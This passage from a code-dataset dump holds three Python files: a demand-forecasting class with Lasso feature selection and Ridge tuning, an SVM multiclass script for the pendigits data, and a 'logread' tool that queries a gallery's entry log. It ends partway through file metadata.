hyperparameter_tuning\n\n\n # some helper functions \n @staticmethod \n def remove_collinearity(df, r_thresh = 0.99): \n \"\"\"\n identify collinear features\n \"\"\"\n corr_matrix = df.corr().abs()\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\n to_drop = [column for column in upper.columns if any(upper[column] > r_thresh)]\n return to_drop\n\n \n @staticmethod\n def _remove_extra_vars(X): \n \"\"\"\n remove features before training\n \"\"\"\n removed_vars = ['log_actual', 'date', 'log_alp', 'sqrt_actual', 'asin','Customer-Facing Name', 'log_baseline', 'holiday', 'program', 'country', 'actual', 'device_type', 'qty', 'asin_start_date', 'dtcp']\n for var in removed_vars:\n if var in X.columns: \n X = X.drop(var, axis = 1)\n \n return X\n \n @staticmethod\n def compute_mape_bias(y_true, y_pred, clip = True):\n \"\"\"\n compute MAPE and bias \n \"\"\"\n bias = (np.sum(y_pred) - np.sum(y_true))/np.sum(y_true)\n pe = np.abs(bias)\n rmse = np.sqrt(np.mean(pow(y_pred-y_true,2)))\n\n if clip: \n bias = np.clip(bias,-1,1)\n pe = min(pe,1)\n\n return pe, bias, rmse\n \n\n def _perform_stability_selection(self, alphas, X, y, n_bootstrap_iterations = 100, seed = 0):\n \"\"\"\n perform bootstrapped feature selection (pre-alpha mode)\n \"\"\"\n \n n_samples, n_variables = X.shape\n n_alphas = alphas.shape[0]\n rnd = np.random.RandomState(seed)\n selected_variables = np.zeros((n_variables,n_bootstrap_iterations))\n stability_scores = np.zeros((n_variables, n_alphas))\n\n for idx, alpha, in enumerate(alphas):\n for iteration in range(n_bootstrap_iterations):\n bootstrap = rnd.choice(np.arange(n_samples),\n size= int(n_samples*0.8),\n replace=False)\n\n X_train = X.iloc[bootstrap,:]\n y_train = y.iloc[bootstrap]\n\n params = {'alpha': alpha}\n lasso = Lasso(**params)\n lasso.fit(X_train, y_train)\n selected_variables[:, iteration] = (np.abs(lasso.coef_) > 1e-4)\n\n stability_scores[:, idx] = selected_variables.mean(axis=1)\n\n self.selected_cols = X_train.columns[stability_scores[:,0] > .25].values\n\n \n def _perform_feature_selection(self, X, y, algo = 'lasso'):\n \"\"\"\n perform feature selection using 'lasso' or 'boruta' (boruta is not supported by Eider yet)\n \"\"\"\n \n if self.selected_cols is None: \n X = self._remove_extra_vars(X) # remove extra vars from X\n \n if algo == 'boruta':\n rf_boruta = RandomForestRegressor(n_jobs=40, random_state=self.random_state)\n boruta = BorutaPy(rf_boruta, n_estimators=100, verbose=2, alpha = 0.05)\n boruta.fit(X.values, y.values.ravel())\n self.selected_cols = X.columns[boruta.support_]\n elif algo == 'lasso': \n lr = Lasso(alpha = self.LASSO_FEATURE_SELECTION_PENALTY).fit(X, y)\n model = SelectFromModel(lr, prefit=True)\n self.selected_cols = np.unique(np.concatenate([X.columns[model.get_support()].values, ['covid', 'asp']]))\n# print(self.selected_cols)\n else: \n print('currently supporting only Boruta or Lasso')\n\n \n def perform_hyperparameter_tuning(self, X,y, model_name = 'ridge', n_values = 100):\n if model_name == 'ridge':\n# model = Ridge()\n# reg_pipeline = Pipeline([('scaler', MinMaxScaler()), \n# ('Ridge', Ridge())])\n\n# param_grid = [{'alpha': np.logspace(-5,5,100)}]\n param_dist = {'alpha': loguniform(1e-5, 1e0)}\n clf = RandomizedSearchCV(estimator = Ridge(normalize = True), param_distributions = param_dist, n_iter = 50, n_jobs = 10, random_state = self.random_state)\n clf.fit(X, y)\n return clf.best_params_ \n \n else: \n print(\"Only supporting Ridge for now\")\n \n def fit(self, X,y):\n \n # length 
checks\n assert(X.shape[0] == len(y))\n X = self._remove_extra_vars(X)\n X.replace([np.inf, -np.inf], np.nan,inplace=True)\n X.fillna(X.mean(), inplace = True) # fill nan's values \n\n\n if self.feature_selection and (self.selected_cols is None):\n print('running feature selection ...')\n self._perform_feature_selection(X,y)\n \n X = X[self.selected_cols]\n \n \n if self.model_name == 'ridge':\n \n best_params = {'alpha':self.RIDGE_PENALTY} # default hyperparameters\n if self.hyperparameter_tuning: \n print(\"Running hyperparameter tuning ...\")\n best_params = self.perform_hyperparameter_tuning(X, y, self.model_name)\n\n # print('The best param(s) are {}'.format(best_params))\n self.model = Ridge(**best_params)\n\n self.model.fit(X, y)\n \n def predict(self, X): \n \n X = self._remove_extra_vars(X)\n X.replace([np.inf, -np.inf], np.nan,inplace=True)\n X.fillna(X.mean(), inplace = True) # fill nan's values \n y_pred = self.model.predict(X)\n vlt_vars = X.columns[['vlt' in x for x in X.columns]]\n \n for vlt_var in vlt_vars: # set VLT vars to 0\n X[vlt_var] = 0.0 \n\n y_pred = self.model.predict(X)\n if self.transformation == 'log':\n y_pred = np.exp(y_pred)\n if self.transformation == 'sqrt': \n y_pred = pow(y_pred,2)\n \n return y_pred \n \n\n # perform backcast on certain periods\n def back_cast(self, df, backcast_periods, END_DATE, horizon, metric_clip = True, retrain = True): \n \"\"\"\n Parameters\n ----------\n retrain : bool\n Redo feature selection for each new forecast version \n \n \"\"\"\n \n df.replace([np.inf, -np.inf], np.nan,inplace=True)\n\n \n result_vec = []\n for i, training_to in enumerate(backcast_periods): \n print('Fold {}'.format(i+1))\n df_result = self.evaluate_model(df, training_to, END_DATE, horizon, metric_clip, model_name = self.model_name, retrain = retrain)\n if df_result is not None:\n result_vec.append(df_result)\n \n df_result_all = pd.concat(result_vec)\n# print(df_result_all)\n \n # save program-level result\n self.program_result = df_result_all\n \n # get program level MAPEs and Biases\n weight_vec, wmape_vec, wbias_vec = [], [], []\n programs = df_result_all.program.unique()\n program_vec = []\n for program in programs:\n temp = df_result_all[df_result_all.program == program]\n wmape = np.sum(temp['ape']*temp['weight'])/np.sum(temp['weight'])\n wbias = np.sum(temp['bias']*temp['weight'])/np.sum(temp['weight'])\n weight = np.sum(temp['weight'])\n wmape_vec.append(wmape)\n wbias_vec.append(wbias)\n program_vec.append(program)\n weight_vec.append(weight)\n\n df_horizon = pd.DataFrame({'program': program_vec, 'wmape': wmape_vec, 'wbias': wbias_vec, 'weight':weight_vec})\n df_horizon['horizon'] = horizon\n df_horizon = df_horizon.sort_values(by = ['program'])\n \n # get topline level MAPE and BIAS\n w_vec, b_vec, wei_vec = [], [], []\n for training_to in df_result_all.training_to.unique():\n weight_vec, wmape_vec, wbias_vec = [], [], []\n programs = df_result_all.program.unique()\n program_vec = []\n df_temp = df_result_all[df_result_all.training_to == training_to]\n for program in df_temp.program.unique():\n temp = df_temp[df_temp.program == program]\n wmape = np.sum(temp['ape']*temp['weight'])/np.sum(temp['weight'])\n wbias = np.sum(temp['bias']*temp['weight'])/np.sum(temp['weight'])\n weight = np.sum(temp['weight'])\n wmape_vec.append(wmape)\n wbias_vec.append(wbias)\n program_vec.append(program)\n weight_vec.append(weight)\n\n wmape_vec = np.array(wmape_vec)\n wbias_vec = np.array(wbias_vec)\n program_vec = np.array(program_vec)\n wmape = 
np.nansum(wmape_vec*weight_vec)/np.nansum(weight_vec)\n wbias = np.nansum(wbias_vec*weight_vec)/np.nansum(weight_vec)\n weight = np.nansum(weight_vec)\n\n w_vec.append(wmape)\n b_vec.append(wbias)\n wei_vec.append(weight)\n \n w_vec, b_vec, wei_vec = np.array(w_vec), np.array(b_vec), np.array(wei_vec)\n \n # topline mape bias\n wmape_aucc, wbias_aucc = np.sum(w_vec*wei_vec)/np.sum(wei_vec), np.sum(b_vec*wei_vec)/np.sum(wei_vec)\n\n df_horizon = df_horizon.append({'program': 'AuCC', 'wmape':wmape_aucc, 'wbias': wbias_aucc, 'horizon':horizon}, ignore_index = True)\n \n return df_horizon, df_result_all\n \n \n def evaluate_model(self, df, training_to, END_DATE, horizon, metric_clip, model_name = 'LR', save_forecasts = False, retrain = True): \n \n print('Preparing training and test sets ...')\n \n df_program = df[['date', 'program']]\n \n if (training_to + pd.Timedelta(days = horizon*7-1)) < pd.to_datetime(END_DATE): \n\n\n forecast_to = training_to + pd.Timedelta(days = horizon*7)\n forecast_to = forecast_to.strftime('%Y-%m-%d')\n training_to = training_to.strftime('%Y-%m-%d')\n print('Training model up to {} and forecasting up to {}'.format(training_to, forecast_to))\n\n \n if model_name == 'SVR': # create trends for SVR \n df['trend_6m'] = (pd.to_datetime(df['date'])-(pd.to_datetime(training_to) - pd.Timedelta(30*6))).dt.days\n df['trend_6m'] = np.where(df['trend_6m']<=0,0,np.log(df['trend_6m']))\n df['trend_12m'] = (pd.to_datetime(df['date'])-(pd.to_datetime(training_to) - pd.Timedelta(30*12))).dt.days\n df['trend_12m'] = np.where(df['trend_12m']<=0,0,np.log(df['trend_12m']))\n \n\n # create train/test sets\n train = df[df.date < training_to]\n test = df[(df.date >= training_to) & (df.date < forecast_to)]\n if self.transformation == 'log':\n y_train, X_train = np.log(train['actual'] + self.EPSILON_LOG_ACTUAL), self._remove_extra_vars(train)\n y_test, X_test = np.log(test['actual'] + self.EPSILON_LOG_ACTUAL), self._remove_extra_vars(test)\n \n if self.transformation == 'sqrt':\n y_train, X_train = np.sqrt(train['actual']), self._remove_extra_vars(train)\n y_test, X_test = np.sqrt(test['actual']), self._remove_extra_vars(test)\n \n X_train.fillna(X_train.mean(), inplace = True) # fill nan's values \n X_test.fillna(X_test.mean(), inplace = True) # fill nan's values\n \n # reset feature set for each forecast version\n if retrain: \n self.selected_cols = None\n\n \n # feature selection\n if self.selected_cols is None: \n print('Running feature selection ...')\n self._perform_feature_selection(X_train, y_train)\n\n \n X_train = X_train[self.selected_cols]\n X_test = X_test[self.selected_cols]\n \n \n# to_drop = self.remove_collinearity(X_train, r_thresh = 0.80)\n# print('collinear features: {}'.format(to_drop))\n# X_train = X_train.drop(to_drop, axis = 1)\n# X_test = X_test.drop(to_drop, axis = 1)\n \n n_unique = X_train.apply(lambda x: len(np.unique(x))) \n selected_vars = X_train.columns[~((n_unique > 2) & (n_unique < 40))]\n var_list = X_train[selected_vars].columns[X_train[selected_vars].apply(lambda x: np.std(x)) == 0]\n print('Dropping constant vars: {}'.format(var_list.values))\n X_train = X_train.drop(var_list, axis = 1)# test correlations\n X_test = X_test.drop(var_list, axis = 1)\n train = train.drop(var_list, axis = 1)\n\n train_program = df_program[df_program.date < training_to]\n test_program = df_program[(df_program.date >= training_to) & (df_program.date < forecast_to)]\n \n\n # train model and generate forecasts\n if model_name == 'SVR': # based on Vicky's code\n sc_y = 
StandardScaler()\n y_pre = train[['sqrt_actual']]\n y = sc_y.fit_transform(y_pre)\n X_pre = X_train\n pipeline = Pipeline([('scaler', StandardScaler()),('estimator', SVR(C=self.SVR_C, epsilon=self.SVR_epsilon, gamma='auto', kernel='poly',degree = 3))])\n pipeline.fit(X_pre, y)\n X_test['instock_pct'] = 1.0 \n y_pred = sc_y.inverse_transform(pipeline.predict(X_test))\n\n if model_name == 'LR':\n \n model = LinearRegression()\n print(X_train.columns.values)\n model.fit(X_train,y_train)\n print('max coef. {}'.format(np.max(np.abs(model.coef_)))) # check coefs\n vlt_vars = X_test.columns[['vlt' in x for x in X_test.columns]]\n for vlt_var in vlt_vars: # set VLT vars to 0\n X_test[vlt_var] = 0.0 # unconstrained forecast\n \n y_pred = model.predict(X_test)\n \n if model_name == 'ridge':\n \n best_params = {'alpha':self.RIDGE_PENALTY} # default hyperparameters\n if self.hyperparameter_tuning: \n print(\"Running hyperparameter tuning ...\")\n best_params = self.perform_hyperparameter_tuning(X_train, y_train, self.model_name)\n \n print('The best param(s) are {}'.format(best_params))\n model = Ridge(**best_params, normalize = True)\n model.fit(X_train,y_train)\n \n vlt_vars = X_test.columns[['vlt' in x for x in X_test.columns]]\n for vlt_var in vlt_vars: # set VLT vars to 0\n X_test[vlt_var] = 0.0 \n y_pred = model.predict(X_test)\n \n if model_name == 'KRR': # need to reoptimize later\n params = {'alpha': 0.0001,'gamma': 0.0022,'kernel': 'laplacian'}\n model = KernelRidge(**params)\n reg_pipeline = make_pipeline(StandardScaler(), model)\n reg_pipeline.fit(X_train,y_train)\n X_test['vlt'] = 0.0 # unconstrained forecast\n y_pred = reg_pipeline.predict(X_test)\n\n\n if save_forecasts: \n test['y_pred'] = y_pred\n self.forecasts = test\n\n # evaluate performance at program-level\n ape_vec = []\n weight_vec = []\n bias_vec = []\n training_to_vec = []\n program_vec = []\n for program in train_program.program.unique():\n mask = (test_program.program == program).values\n if np.sum(mask) > 0:\n y_pred_program = y_pred[mask]\n y_test_program = y_test[mask]\n \n # check lengths\n assert len(y_pred_program) == len(y_test_program)\n \n # untransform y\n if self.transformation == 'log': \n y_test_program = np.exp(y_test_program) - self.EPSILON_LOG_ACTUAL\n y_pred_program = np.exp(y_pred_program) - self.EPSILON_LOG_ACTUAL\n elif self.transformation == 'sqrt':\n y_test_program = pow(y_test_program,2)\n y_pred_program = pow(y_pred_program,2)\n\n ape, bias, rmse = self.compute_mape_bias(y_test_program, y_pred_program, metric_clip)\n weight_vec.append(np.sum(y_test_program))\n ape_vec.append(ape)\n bias_vec.append(bias)\n program_vec.append(program)\n\n df_result = pd.DataFrame({'program':program_vec, 'ape':ape_vec, 'weight':weight_vec, 'bias':bias_vec})\n df_result['training_to'] = training_to\n \n# print(df_result)\n return df_result\n else:\n print('Less than {} weeks to forecast'.format(horizon))\n return None\n \n \n\n ", "sub_path": "utils/LR_prod.py", "file_name": "LR_prod.py", "file_ext": "py", "file_size_in_byte": 19151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.triu", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 89, "usage_type": "call"}, {"api_name": 
"numpy.sqrt", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 122, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 145, "usage_type": "call"}, {"api_name": "sklearn.utils.fixes.loguniform", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 224, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 302, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 302, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 312, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 312, "usage_type": "call"}, 
{"api_name": "numpy.where", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 314, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 354, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 366, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 380, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 395, "usage_type": "call"}, {"api_name": "sklearn.kernel_ridge.KernelRidge", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 445, "usage_type": "call"}]} +{"seq_id": "125093907", "text": "import random\nimport sys\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport svmutil\nfrom mwv_svm import mwv_svm\nfrom wta_svm import wta_svm\n\ntrain_path = \"../data/pendigits/pendigits\"\ntest_path = \"../data/pendigits/pendigits.t\"\n\n\"\"\"\nExamples of options: -s 0 -c 10 -t 1 -g 1 -r 1 -d 3\nClassify a binary data with polynomial kernel (u'v+1)^3 and C = 10\n\n\noptions:\n-s svm_type : set type of SVM (default 0)\n 0 -- C-SVC\n 1 -- nu-SVC\n 2 -- one-class SVM\n 3 -- epsilon-SVR\n 4 -- nu-SVR\n-t kernel_type : set type of kernel function (default 2)\n 0 -- linear: u'*v\n 1 -- polynomial: (gamma*u'*v + coef0)^degree\n 2 -- radial basis function: exp(-gamma*|u-v|^2)\n 3 -- sigmoid: tanh(gamma*u'*v + coef0)\n-d degree : set degree in kernel function (default 3)\n-g gamma : set gamma in kernel function (default 1/num_features)\n-r coef0 : set coef0 in kernel function (default 0)\n-c cost : set the parameter C of C-SVC, epsilon-SVR, and nu-SVR (default 1)\n-n nu : set the parameter nu of nu-SVC, one-class SVM, and nu-SVR (default 0.5)\n-p epsilon : set the epsilon in loss function of epsilon-SVR (default 0.1)\n-m cachesize : set cache memory size in MB (default 100)\n-e epsilon : set tolerance of termination criterion (default 0.001)\n-h shrinking: whether to use the shrinking heuristics, 0 or 1 (default 1)\n-b probability_estimates: whether to train a SVC or SVR model for 
probability estimates, 0 or 1 (default 0)\n-wi weight: set the parameter C of class i to weight*C, for C-SVC (default 1)\n\nThe k in the -g option means the number of attributes in the input data.\n\"\"\"\n\n\"\"\"\nRBF Gaussian / Polinomial\n\"\"\"\n\n\ndef read_dataset(path, shuffle=False):\n ys, xs = svmutil.svm_read_problem(path)\n\n if not shuffle:\n return ys, xs\n\n data = list(zip(ys, xs))\n random.shuffle(data)\n\n ys_shuf, xs_shuf = [], []\n\n for v in data:\n ys_shuf.append(v[0])\n xs_shuf.append(v[1])\n\n return ys_shuf, xs_shuf\n\n\ndef get_data():\n ys_train, xs_train = read_dataset(train_path, shuffle=True)\n ys_test, xs_test = read_dataset(test_path, shuffle=True)\n\n return (ys_train, xs_train), (ys_test, xs_test)\n\n\ndef preview(train, test):\n (ys_train, xs_train), (ys_test, xs_test) = train, test\n\n x_counts = defaultdict(lambda: 0)\n y_counts = defaultdict(lambda: 0)\n\n xs = xs_train + xs_test\n ys = ys_train + ys_test\n for i in range(len(xs)):\n for k in xs[i].keys():\n x_counts[k] += 1\n y_counts[ys[i]] += 1\n\n fig, ax = plt.subplots(figsize=(10, 10))\n ax.bar(y_counts.keys(), y_counts.values(), 0.5, color=\"g\")\n plt.xticks(np.arange(10))\n # plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n plt.show()\n pass\n\n\ndef main():\n (ys_train, xs_train), (ys_test, xs_test) = get_data()\n\n # preview((ys_train, xs_train), (ys_test, xs_test))\n # exit(0)\n\n k2i = {\"rbf\": 2, \"poly\": 1}\n\n methods = {\"wta\": wta_svm, \"mwv\": mwv_svm}\n\n methods[sys.argv[1]](\n ys_test,\n xs_test,\n ys_train,\n xs_train,\n ktype=k2i[sys.argv[2]],\n gamma=float(sys.argv[3]),\n )\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "scratch/multiclass.py", "file_name": "multiclass.py", "file_ext": "py", "file_size_in_byte": 3202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "svmutil.svm_read_problem", "line_number": 53, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 59, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "wta_svm.wta_svm", "line_number": 106, "usage_type": "name"}, {"api_name": "mwv_svm.mwv_svm", "line_number": 106, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}]} +{"seq_id": "331554300", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on May 11, 2015\n\n@author: IbnouT / ibnou.toure001@gmail.com\n@Team: TheBadBoyz\n'''\nimport sys\nfrom src.LogFile import MyLogFile\nfrom src import LogFile\nfrom sortedcontainers import SortedDict, SortedList\nfrom src.ArgsParser import MyParser\nfrom src import ArgsParser\n'''\nfrom 
src.ArgsParser import MyParser\nfrom src import ArgsParser\n'''\n\ndef executeTask(params):\n    '''\n    Process a set of valid parameters to query the log\n    '''\n    \n    #Get reference to log file object \n    myLogs = MyLogFile(params.log, params.token)\n    \n    #Open log file\n    ret = myLogs.open(True)\n    if ret < 0 : return ret\n\n\n    #--------------------------------------------------------------\n    # Case -S : Print the current state of the log to stdout.\n    #-------------------------------------------------------------- \n    if params.state :\n        #--> Get all people in Gallery\n        #item, self.logs[item][INDEX_LAST_LOG_ENTRY][IDX_ROOMID], self.logs[item][INDEX_DIR]\n        myIter = myLogs.getPeopleInGalleryRooms() \n        #--> Init and populates lists\n        rooms = SortedDict()\n        employes = SortedList()\n        guests = SortedList()\n        \n        for item in myIter : \n            #register this room if the person did not leave it\n            if item[2] != LogFile.DIR_L :\n                if item[1] not in rooms : rooms[item[1]] = SortedList()\n                rooms[item[1]].add(item[0][1:])\n            \n            #in all case the person is in the gallery\n            if item[0][:1] == LogFile.PREFIX_E: employes.add(item[0][1:])\n            else: guests.add(item[0][1:])\n        \n        #-->Employes in the Gallery\n        print(\",\".join(employes))\n        \n        #-->Guests in the Gallery\n        print (\",\".join(guests))\n        \n        #-->People per room\n        for room in (room for room in rooms if (room != LogFile.GALLERY_ID)) : #more pythonic way :D\n            #if room != LogFile.GALLERY_ID : \n            print (\"{0}: {1}\".format(room, \",\".join(rooms[room])))\n        \n        return 0\n    \n    \n    #--------------------------------------------------------------\n    # Case -R : Give a list of all rooms entered by an employee or guest.\n    #-------------------------------------------------------------- \n    if params.roomlist :\n        #--> Get all rooms \n        if params.employee != None : \n            rooms = map(str, list(myLogs.getRoomsVisitedByPerson(LogFile.PREFIX_E+params.employee, LogFile.TYPE_E)))\n        else :\n            rooms = map(str, list(myLogs.getRoomsVisitedByPerson(LogFile.PREFIX_G+params.guest, LogFile.TYPE_G))) \n        \n        lenrooms = len(rooms)\n        if lenrooms > 0 : \n            listRooms = []\n            for i in xrange(lenrooms-1, -1, -2) : \n                listRooms.append(rooms[i])\n            print (\",\".join(listRooms))\n        \n        return 0\n    \n    \n    #--------------------------------------------------------------\n    # Case -T : Gives the total time spent in the gallery by an employee or guest.\n    #-------------------------------------------------------------- \n    if params.totaltime :\n        #--> Get all rooms\n        if params.employee != None : \n            totalTime = myLogs.getTotalTimePerson(LogFile.PREFIX_E+params.employee, LogFile.TYPE_E)\n        else :\n            totalTime = myLogs.getTotalTimePerson(LogFile.PREFIX_G+params.guest, LogFile.TYPE_G)\n        \n        if totalTime >= 0 : print (totalTime)\n        \n        return 0\n    \n    \n    #--------------------------------------------------------------\n    # Case -I : Prints the rooms, as a comma-separated list of room IDs, \n    # that were occupied by all the specified employees and guests at the \n    # same time over the complete history of the gallery.\n    #-------------------------------------------------------------- \n\n    if params.allroomlist :\n        rooms = myLogs.getSharedRoomsVisited(params.employee, params.guest)\n        if len(rooms) > 0 : print (\",\".join(rooms))\n        \n        return 0 \n    \n    return -1\n\n\n\ndef main():\n    '''\n    Main function\n    '''\n    '''\n    ' Initialization\n    '''\n    #Prepare the commandline args parser\n    #parserApp = MyParser(ArgsParser.LOG_READ, \"Parser for 'logread' inputs args\")\n    parserApp = MyParser(ArgsParser.LOG_READ)\n    \n    #If combination of args are not valid\n    if not 
parserApp.isArgsValid() :\n        print (\"invalid\")\n        return -1\n    \n    ret = executeTask(parserApp.params)\n    \n    if ret == -1 : print (\"invalid\")\n    elif ret == -2 : print (\"integrity violation\")\n    \n    return ret\n\n\n\n\nif __name__ == '__main__':\n    \n    #sys.exit(main()) \n\n    try: \n        #call the main function\n        ret = main()\n        \n    except:\n        print (\"invalid\")\n        ret = -1 \n    \n\n    sys.exit(ret) \n\n    ", "sub_path": "143/code/build/logread.py", "file_name": "logread.py", "file_ext": "py", "file_size_in_byte": 4832, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "src.LogFile.MyLogFile", "line_number": 26, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedDict", "line_number": 41, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedList", "line_number": 42, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedList", "line_number": 43, "usage_type": "call"}, {"api_name": "src.LogFile.DIR_L", "line_number": 47, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 47, "usage_type": "name"}, {"api_name": "sortedcontainers.SortedList", "line_number": 48, "usage_type": "call"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 52, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 52, "usage_type": "name"}, {"api_name": "src.LogFile.GALLERY_ID", "line_number": 62, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 62, "usage_type": "name"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 75, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_G", "line_number": 77, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 77, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_G", "line_number": 77, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 95, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 95, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_E", "line_number": 95, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_G", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 97, "usage_type": 